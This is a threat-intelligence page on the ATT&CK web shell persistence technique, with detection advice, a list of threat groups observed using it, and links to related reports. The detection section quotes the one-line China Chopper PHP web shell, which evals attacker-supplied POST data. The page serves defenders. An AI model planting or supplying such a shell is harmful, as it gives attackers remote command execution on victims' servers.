Web Shell
Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to access the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. China Chopper Web shell client).
Open detection, hunting, mitigation, and evidence workspace
Detection logic
Web shells can be difficult to detect. Unlike other forms of persistent remote access, they do not initiate connections. The portion of the Web shell that is on the server may be small and innocuous looking. The PHP version of the China Chopper Web shell, for example, is the following short payload: <?php @eval($_POST['password']);> Nevertheless, detection mechanisms exist. Process monitoring may be used to detect Web servers that perform suspicious actions such as spawning cmd.exe or accessing files that are not in the Web directory. File monitoring may be used to detect changes to files in the Web directory of a Web server that do not match with updates to the Web server's content and may indicate implantation of a Web shell script. Log authentication attempts to the server and any unusual traffic patterns to or from the server and internal network.
Observed actors
G0082GALLIUM
G0093Kimsuky
G0094Volt Typhoon
G1017Dragonfly
G0035APT32
G0050HAFNIUM
G0125Sandworm Team
G0034CURIUM
G1012APT39
G0087Moses Staff
G1009OilRig
G0049Tropic Trooper
G0081Leviathan
G0065APT29
G0016TEMP.Veles
G0088BackdoorDiplomacy
G0135Deep Panda
G0009Ember Bear
G1003Volatile Cedar
G0123Agrius
G1030APT28
G0007APT5
G1023Fox Kitten
G0117Tonto Team
G0131Magic Hound
G0059Threat Group-3390
G0027FIN13
G1016
Correlated CTI and IR reports
Check Point Research · direct source mappingOilRig G0049
MITRE ATT&CK · direct source mappingUNC1860 and the Temple of Oats: Iran's Hidden Hand in Middle Eastern Networks
Google Cloud / Mandiant · direct source mappingLebanese Cedar APT
ClearSky Cyber Security · direct source mappingIranian Government-Sponsored APT Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities
CISA · curated primary-source mappingAPT41 Targeting Pharmaceutical Sector: Log4Shell to Domain Compromise
1200km CTI repository · explicit report mentionATT&CK as a Working Tool: Theory and Hands-On Practical Usage
1200km CTI repository · explicit report mentionAttack Playbook — Operation DragonRx
1200km CTI repository · explicit report mentionCTI Research: Handala Hack Group (aka Handala Hack Team)
1200km CTI repository · explicit report mentionCTI Research: Handala Hack Group (aka Handala Hack Team)
1200km CTI repository · explicit report mentionDefensive CTI Research on Threats to Israeli Government and Public-Sector Environments
Israel Threat Actors CTI · explicit report mentionDefensive Cyber Threat Intelligence Report: Israeli Critical Infrastructure and Geopolitical Escalation (2024-2026)
Israel Threat Actors CTI · explicit report mentionFrom Threat Intelligence to Detection: A Practitioner's Guide
1200km CTI repository · explicit report mentionOperation DragonRx — APT41 Full Attack Simulation
1200km CTI repository · explicit report mentionOperation DragonRx: Simulating an APT41 Attack End-to-End — From Log4Shell to DFIR and Malware Analysis
1200km CTI repository · explicit report mentionPioneer Kitten (Fox Kitten, Lemon Sandstorm, UNC757) – Actor Deep Research
Israel Threat Actors CTI · explicit report mentionWorked Cases
Israel Threat Actors CTI · explicit report mentionAPT41 Targeting Pharmaceutical Sector Log4Shell to Domain Compromise
1200km Medium · authored report mentionAttack Playbook Operation DragonRx
1200km Medium · authored report mentionCTI Analyst Field Manual Complete Reference
1200km Medium · authored report mentionCTI Led Defensive Strategy for a Cellular Provider Case Study
1200km Medium · authored report mentionCTI Research Handala Hack Group aka Handala Hack Team
1200km Medium · authored report mentionFrom Threat Intelligence to Detection A Practitioner s Guide
1200km Medium · authored report mentionOperation DragonRx Simulating an APT41 Attack End to End From Log4Shell to DFIR and Malware
1200km Medium · authored report mentionSingle Event Detection Rules in Cybersecurity
1200km Medium · authored report mention